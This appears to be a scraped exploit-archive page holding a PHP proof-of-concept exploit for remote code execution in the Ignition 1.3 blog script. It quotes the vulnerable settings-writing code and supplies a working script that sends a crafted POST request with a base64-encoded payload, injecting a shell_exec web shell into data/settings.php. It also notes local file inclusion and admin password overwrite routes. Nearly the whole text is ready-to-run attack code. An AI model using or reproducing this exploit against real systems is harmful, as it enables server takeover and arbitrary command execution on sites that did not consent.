扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 |
<?php /* Ignition 1.3 Remote Code Execution Exploit by cOndemned download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz source of i-options.php 1. <?php 2. session_start(); 3. if ($_POST['submit']) { 4. if ($FH = @fopen('data/settings.php', 'w')) { 5. @fwrite($FH, '<?php $pass = "'.$_POST['pass'].'"; 6. $uri = "'.$_POST['uri'].'"; 7. $suri = "'.$_POST['suri'].'"; 8. $blogtitle = "'.$_POST['title'].'"; 9. $description = "'.$_POST['description'].'"; 10. $postid = "'.$_POST['id'].'"; 11. $author = "'.$_POST['author'].'"; 12. $skin = "'.$_POST['skin'].'"; 13. $gravatar = "'.$_POST['gravatar'].'"; 14. $twitter = "' . $_POST['twitter'] . '"; 15. $identica = "' . $_POST['identica'] . '"; 16. $book = "' . $_POST['book'] . '"; 17. $game = "' . $_POST['game'] . '"; 18. $language = "' . $_POST['lang'] . '"; 19. 20. require_once("template.php"); 21. require_once("lang/$language.php");'); 22. #fclose($FH); 23. } We can overwrite setting.php by simply sending specially crafted POST request, and put some evil code into one of the variables. After running my PoC line with $language var will be: $language = "en";echo @shell_exec($_GET['cmd']);$wtf=""; Where "en" is default language and without filling this field correctly admin will see error while trying to access blog index. other attacks scenarios: - attacker can use $_POST['language'] variable to exploit Local File Inclusion (lines 18 and 21) - fill $_POST['pass'] with new password (md5 hashed) to overwrite admins password - etc... */ $target = 'http://localhost/ignition/'; $post = array ( 'uri' => $target, 'suri' => $target, 'description' => 'Just another lame php blog script owned :<', 'skin' => 'default', 'lang' => base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='), 'submit' => 1 ); $sock = curl_init(); curl_setopt_array ( $sock, array ( CURLOPT_URL => "$target/i-options.php", CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post) ) ); curl_exec($sock); curl_close($sock); echo "Check: $target/data/settings.php?cmd=[system_command]"; ?> |
体验盒子
